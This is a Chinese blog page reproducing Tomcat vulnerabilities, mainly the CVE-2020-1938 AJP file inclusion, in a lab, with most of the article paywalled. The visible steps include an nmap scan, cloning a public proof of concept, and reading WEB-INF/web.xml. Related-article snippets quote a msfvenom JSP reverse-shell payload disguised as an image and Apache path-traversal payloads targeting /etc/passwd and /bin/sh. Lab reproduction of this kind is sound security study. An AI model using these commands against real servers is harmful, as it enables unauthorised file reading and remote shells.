【Tomcat漏洞复现】CVE-2020-1938文件包含漏洞+Tomcat8+弱口令&&后台getshell漏洞+CVE_2017_12615远程代码执行漏洞

最新推荐文章于 2025-03-06 16:20:23 发布
最新推荐文章于 2025-03-06 16:20:23 发布
阅读量1.8w 收藏 38
点赞数 9
分类专栏: 漏洞复现 文章标签: tomcat 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120029698
版权
该文章详细介绍了CVE-2020-1938漏洞的复现步骤,包括通过nmap扫描、POC脚本读取Tomcat服务器的敏感文件以及利用文件包含漏洞获取RCE。同时,提到了漏洞的修复方法,如禁用AJP端口和设置认证限制。此外,还涉及了Tomcat弱口令和后台getshell漏洞的利用过程,包括msfconsole爆破、上传恶意war包和使用冰蝎连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2020-1938

Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等。

tomcat默认的conf/server.xml中配置了2Connector,一个为8080的对外提供的HTTP协议端口,另外一个就是默认的8009 AJP协议端口,两个端口默认均监听在外网ip

1.使用nmap对靶机进行扫描,查看8009端口是否处于开放状态:

nmap -sS -p 1-65535 -v 192.168.225.139

2.从Github克隆POC脚本到本地kali:

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi.git

3.尝试读取靶机上Tomcat服务器的/usr/local/tomcat/webapps/ROOT/WEB-INF文件:

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.225.139 -p 8009 -f WEB-INF/web.xml
最低0.47元/天 解锁文章
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)
代码讲故事
03-19 451
Weblogic 弱口令 && 后台getshell漏洞 && SSRF漏洞复现 && SSRF漏洞绕过IP限制 && 任意文件上传漏洞复现(附源码)。
Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1644
来到vulhub/tomcat/tomcat8/靶场。
CVE-2020-1938
sechelper的博客
12-07 1188
CVE-2020-1938漏洞复现
CVE-2020-1938 Tomcat 文件读取/包含漏洞复现,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
03-06 1650
同时,如果此应用在网站服务中具备上传功能,攻击者也可以先向服务端上传一个含有JSP代码的恶意文件(上传文件可以是任意类型,图片、纯文本文件等),然后利用Gh0stcat进行文件包含,从而达到代码执行的危害。2月20日,国家信息安全漏洞共享平台(CNVD)发布安全公告,该漏洞综合评级为高危,漏洞编号为CNVD-2020-10487,CVE 编号 CVE-2020-1938。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个,这里我改成了8000端口。大白也帮大家准备了详细的学习成长路线图。
【网络安全---漏洞复现Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 2万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
Tomcat AJP 文件包含漏洞CVE-2020-1938
m0_61506558的博客
11-20 8478
1.漏洞简介1.漏洞简介2020年2月20日,公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞CVE-2020-1938)。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控参数。
CVE-2020-1938(RCE利用)
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
Tomcat 文件读取/文件包含(CVE-2020-1938)漏洞复现
一纸荒芜的博客
04-12 1919
CVE-2020-1938漏洞复现
Vulhub - Tomcat8 + 弱口令 && 后台getshell 漏洞复现
多崎巡礼的博客
11-08 7469
VulHubTomcat8+ 弱口令 && 后台getshell 漏洞环境实验 1.启动docker镜像 docker基于Ubuntu 已搭建完成。 拉取项目git clone https://github.com/vulhub/vulhub.git 进入镜像:cd vulhub/tomcat/tomcat8/ 启动环境:docker-compose up -d 2.登录tomca...
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
xiaoheizi的博客
07-13 387
将访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 6117
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
CVE-2020-1938:CVE-2020-1938
03-20
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试tomcat 验证工具-1(有BUG): 任意文件读取 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp 文件包含 java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp 打包方式:在目录tomcat / ajp-bug执行mvn clean compile assembly:assembly 来源: : 验证工具-2
CVE-2020-1938TomcatAjpScanner-master.zip
02-23
CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!
Aapache Tomcat AJP 文件包含漏洞CVE-2020-1938
weixin_45653478的博客
05-10 1175
CVE-2020-1938 是 Apache Tomcat 中的一个严重安全漏洞,该漏洞涉及到 Tomcat 的 AJP(Apache JServ Protocol)连接器。由于 AJP 协议在处理请求时存在缺陷,攻击者可以利用此漏洞读取服务器上的任意文件,甚至可能进一步实现远程代码执行
CVE-2020-1938漏洞复现(文末附EXP代码)
Vitaminapple的博客
05-31 1万+
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y
CVE-2021-21166
weixin_48300170的博客
07-14 1386
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
tomcat CVE-2020-1938
qq_46804551的博客
04-08 163
搭建 下载好运行即可 访问成功 漏洞复现 Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。 攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞Tomcat服务器上Web目录文件。 漏洞验证POC https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 漏洞验证,尝试读取文件: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 成功访问到配置文
Apache Tomcat文件包含漏洞(CVE-2020-1938)
09-11
嗨!对于Apache Tomcat文件包含漏洞(CVE-2020-1938),该漏洞是在2020年2月份公开的,影响Tomcat 9.0.0.M1至9.0.30以及8.5.0至8.5.50版本。该漏洞允许攻击者通过发送特制的请求来执行任意文件的读取和包含。 该漏洞的根本原因在于Tomcat的处理器组件(Servlet、WebSocket等)对于路径参数错误地解析了请求。攻击者可以利用这一点来读取或包含Web应用程序中的敏感文件,甚至可能在服务器上执行恶意代码。 由于该漏洞的危害性较高,建议及时升级到Tomcat 9.0.31或8.5.51版本,这些版本修复了该漏洞。此外,如果无法立即升级,你可以考虑使用防火墙或其他网络安全设备来限制对Tomcat端口的访问,从而减轻潜在攻击的风险。 记住,定期更新和维护所有软件和库是保持系统安全的重要措施之一。同时,合理配置服务器和应用程序,限制访问权限,并进行网络安全审计也是必要的。如果你是Tomcat用户,请务必关注并采取适当的措施来保护你的系统免受该漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值